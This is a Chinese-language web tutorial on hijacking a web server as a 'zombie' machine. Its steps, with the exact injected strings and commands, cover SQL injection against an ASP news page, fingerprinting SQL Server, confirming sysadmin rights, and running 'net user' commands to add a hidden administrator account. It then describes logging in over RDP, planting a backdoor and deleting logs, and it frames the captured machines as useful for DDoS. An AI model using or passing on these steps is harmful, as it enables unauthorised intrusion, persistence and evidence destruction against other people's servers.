熱點推薦:
您现在的位置: 電腦知識網 >> 網絡技術 >> 正文

按部就班 捕獲肉雞

2013-09-12 16:07:39  來源: 網絡技術 

  即使捕獲了菜鳥的肉雞,質量也往往比較差,最多也可以做DDoS肉雞。筆者建議,如果用來學習操作或者研究,還是捕獲服務器肉雞比較好,因為它穩定、24小時在線、速度快……優點數不勝數。下面筆者就帶大家對一個站點進行測試。本文旨在拋磚引玉,希望與大家進行技術交流。
  1.例如http://xxx.cn/news.asp?newsid=1289為我們要測試的地方(為了不必要的麻煩,地址用xxx來代替)。檢測注入漏洞是在網址後輸入“AND 1=1”正常頁面或“AND 1=2”不正常頁面。發現漏洞的過程我想大家都知道,這裡就不多說了。
  2.接著我們來判斷數據庫的類型。在地址後面輸入:and (select count(*) from sysobjects)>0 也就是:http://xxx.cn/news.asp?newsid=1289 and (select count(*) from sysobjects)>0。
  3.從圖1中可以看到頁面正常返回!接著在地址上輸入:and (select count(*) from msysobjects)>0。我們來看一下返回的情況,如圖2所示。

  4.這樣,我們可以判斷,該數據庫是SQL Server。下面,在地址後面輸入這條命令:http://xxx.cn/news.asp?newsid=1289 and 1=(SELECT%20IS_SRVROLEMEMBER('sysadmin'))。TW.WINgWIT.coM
  5.這是判斷讀寫權限,頁面正常返回,如圖3所示。暈,居然是SA權限。拿出NB 聯盟注入工具來測試吧。操作比輸入代碼要簡單,也比較易懂。

  6.在注入地址裡填上要注入的地址,在下面的DOS 命令中輸入“net user”查詢賬戶(圖4)。

  7.接著,輸入“net user hsmw hsmw / add”添加 一個名字為 “hsmw”的賬號(圖5),再輸入“net localgroup administrators hsmw /add”把剛剛添加的hsmw 這個賬號(圖6),提升為管理員權限。

   8.來看添加的效果。輸入“net user”,我們可以看到,多了一個 hsmw的 賬號。這說明添加賬號成功了(圖7)。

  9.再進行簡單的掃描,看看開了3389端口沒有。太“不幸”了,居然開了3389。哈哈,直接用我們剛剛添加的賬號登錄,然後留後門並刪除日志。撤!

 
From:http://tw.wingwit.com/Article/Network/201309/1066.html
  • 上一篇文章:

  • 下一篇文章:
  • 相關文章
      没有相关文章
    推薦文章
    Copyright © 2005-2013 電腦知識網 Computer Knowledge   All rights reserved.